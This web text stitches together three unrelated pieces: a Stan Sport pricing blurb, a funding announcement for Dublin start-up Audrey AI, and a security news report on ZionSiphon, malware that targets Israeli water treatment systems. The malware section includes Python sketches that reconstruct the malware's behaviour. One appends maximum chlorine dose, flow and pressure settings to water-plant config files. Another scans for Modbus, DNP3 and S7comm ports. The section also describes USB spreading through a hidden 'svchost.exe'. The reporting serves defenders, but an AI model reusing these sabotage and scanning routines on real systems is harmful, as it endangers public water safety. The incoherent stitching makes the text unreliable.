Stan
Stan Sport will set you back AU$20 a month (on top of a Stan subscription, which starts at AU$12). It’s also worth noting that the streaming service is currently offering a seven-day free trial.
A subscription will also give you access to Premier League, Champions League and Europa League action, as well as international rugby and Formula E.
The investment will fund growth across auditing and engineering, with expansion expected across Ireland and the UK.
Dublin-based start-up Audrey AI has announced the closure of a $1.8m pre-seed funding round led by Sure Valley Ventures and Delta Partners, with additional participation from Enterprise Ireland, former Calypso CEO Donnchadh Casey, former Wayflyer CBO Conor Jones and a number of former Big 4 auditors.
Established in 2025 by Ryan Loughran and David Burke, who met on the Founders programme at Dogpatch Labs, Audrey AI develops AI solutions for financial auditors. The AI-powered platform aims to automate the most time-consuming parts of financial audit engagements.
The organisation has stated that the newly secured funds will be put towards the expansion of Audrey AI’s specialist audit and engineering teams, as the company expands its reach across Ireland, the UK and “beyond”.
Commenting on the announcement, Loughran, who is also the company’s CEO, said: “Developers have Copilot, lawyers have Harvey, but auditors still primarily work in Excel. We’re building AI that understands auditing deeply enough to raise the bar on quality, not just speed, freeing auditors to focus on the judgement and oversight that matters most.”
A number of Irish organisations operating within the artificial intelligence space have already announced major investments in April. Start-up Otel AI, which is building an AI platform for hotel managers, recently announced a raise of €2m, bringing the company’s total funding to date to €2.8m.
E-commerce technology company Zellor raised €850,000 in its very first external funding round. The start-up, which is led by CEO Niall O’Sullivan, received backing from Enterprise Ireland and a number of strategic Irish investors.
Galway-based AI security software start-up Octostar, which also has offices in Italy and the UK, raised €6.1m in an extended seed funding round.
Updated, 1.05pm, 16 April 2026: This article was amended to clarify Audrey AI’s expansion plans.
A new malware called ZionSiphon, specifically designed for operational technology, is targeting water treatment and desalination environments to sabotage their operations.
The threat can adjust hydraulic pressures and raise chlorine concentrations to dangerous levels, researchers found during their analysis.
Based on its IP targeting and the political messages embedded in its strings, ZionSiphon appears to focus on targets based in Israel.
Researchers at AI-powered cybersecurity company Darktrace found an encryption logic flaw in the malware’s validation mechanism that renders it non-functional, but warn that future ZionSiphon releases could fix the flaw and make the malware fully capable of carrying out attacks.
Upon deployment, the malware checks whether the host IP falls within Israeli ranges and whether the system contains water/OT-related software or files, to ensure it is running in water treatment or desalination systems.
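Darktrace has not published the routine itself, but a geofencing check of this kind usually amounts to testing the host address against a hardcoded list of CIDR blocks. Here is a minimal sketch using Python’s ipaddress module, with made-up ranges standing in for the malware’s real target list:

```python
import ipaddress

# Hypothetical CIDR blocks standing in for the malware's hardcoded ranges
TARGET_RANGES = [ipaddress.ip_network(r) for r in ("5.28.128.0/17", "31.154.0.0/15")]

def in_target_ranges(host_ip: str) -> bool:
    # True if the host address falls inside any of the hardcoded blocks
    addr = ipaddress.ip_address(host_ip)
    return any(addr in net for net in TARGET_RANGES)

print(in_target_ranges("5.28.130.7"))    # True: inside 5.28.128.0/17
print(in_target_ranges("192.168.1.5"))   # False: private address, not targeted
```

A real sample would pair a check like this with the file-system probes for water/OT software that the researchers describe.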
Strings from the targets list Source: Darktrace
Darktrace notes that the logic for country verification is broken due to an XOR mismatch, causing the targeting to fail and triggering the self-destruct mechanism instead of executing the payload.
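The report does not show the broken code, but the failure mode it describes (obfuscating a value with one XOR key and decoding it with a different one) can be sketched as follows; the function names and key values here are hypothetical:

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    # Single-byte XOR obfuscation: applying the same key twice restores the data
    return bytes(b ^ key for b in data)

TARGET = xor_bytes(b"IL", 0x5A)  # country code stored obfuscated with key 0x5A

def country_matches(country_code: str) -> bool:
    # A mismatch of the kind Darktrace describes: decoding with the wrong
    # key (0x5B) means the comparison can never succeed, so the malware's
    # self-destruct path runs instead of the payload.
    return xor_bytes(TARGET, 0x5B) == country_code.encode()

print(country_matches("IL"))  # False, even for the intended target
```

Fixing the bug would be a one-character change, which is why the researchers warn that a future build could be fully functional.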
If ZionSiphon were to activate, it could cause significant damage by increasing chlorine levels and maximizing flow and pressure.
It does this via a function named “IncreaseChlorineLevel(),” which appends a block of text to existing configuration files to push the chlorine dose and flow as high as the plant’s mechanical systems physically allow.
“IncreaseChlorineLevel() checks a hardcoded list of configuration files associated with desalination, reverse osmosis, chlorine control, and water treatment OT/Industrial Control Systems (ICS),” Darktrace says.
“As soon as it finds any one of these files present, it appends a fixed block of text to it and returns immediately.”
“The appended block of text contains the following entries: “Chlorine_Dose=10”, “Chlorine_Pump=ON”, “Chlorine_Flow=MAX”, “Chlorine_Valve=OPEN”, and “RO_Pressure=80”.”
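Pieced together from Darktrace’s description, the routine’s find-append-return behavior would look something like the following Python sketch (the file names and the rendering in Python are illustrative; this is not the actual malware code):

```python
import os

# Hypothetical file names standing in for the hardcoded OT/ICS config list
CONFIG_CANDIDATES = ["desalination.cfg", "ro_plant.cfg", "chlorine_control.cfg"]

# The fixed block of entries Darktrace reports being appended
PAYLOAD = (
    "Chlorine_Dose=10\n"
    "Chlorine_Pump=ON\n"
    "Chlorine_Flow=MAX\n"
    "Chlorine_Valve=OPEN\n"
    "RO_Pressure=80\n"
)

def increase_chlorine_level(search_dir: str) -> bool:
    # Check the hardcoded candidates; as soon as one is present, append
    # the fixed block to it and return immediately, as Darktrace describes.
    for name in CONFIG_CANDIDATES:
        path = os.path.join(search_dir, name)
        if os.path.exists(path):
            with open(path, "a") as f:
                f.write(PAYLOAD)
            return True
    return False
```

The effect depends entirely on the target software re-reading those files, which is why the researchers emphasize the OT-specific targeting rather than any technical sophistication.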
The malware’s intention to interact with industrial control systems (ICS) is evident from its scanning of the local subnet for the Modbus, DNP3, and S7comm communication protocols.
However, Darktrace has found only partially functional code for Modbus, and merely placeholders for the other two, indicating that the malware is still in an early development phase.
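Discovering those protocols on a network typically comes down to probing each one’s well-known TCP port: 502 for Modbus, 20000 for DNP3 and 102 for S7comm. A simplified, single-host sketch of that kind of probe (the function and timeout are illustrative, not taken from the sample):

```python
import socket

# Standard TCP ports for the three OT protocols Darktrace mentions
OT_PORTS = {"Modbus": 502, "DNP3": 20000, "S7comm": 102}

def scan_host(ip: str, timeout: float = 0.5) -> list:
    """Return the OT protocols whose well-known port accepts a TCP connection."""
    found = []
    for proto, port in OT_PORTS.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((ip, port)) == 0:
                found.append(proto)
    return found
```

A full subnet sweep would simply loop this check over every address in the local range; the partially built Modbus code suggests the authors planned to speak the protocol, not just detect it.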
ZionSiphon also has a USB propagation mechanism: it copies itself to removable drives as a hidden file named ‘svchost.exe’ and creates malicious shortcut files that execute the malware when opened.
Creating shortcuts on removable drives Source: Darktrace
USB propagation is a key infection vector in critical infrastructure environments, where computers that manage safety-critical functions are often “air-gapped,” meaning they are not directly connected to the internet.
While ZionSiphon isn’t operational in its current version, its intent and destructive potential are concerning, and all that’s needed to unlock both is a fix for a minor verification error.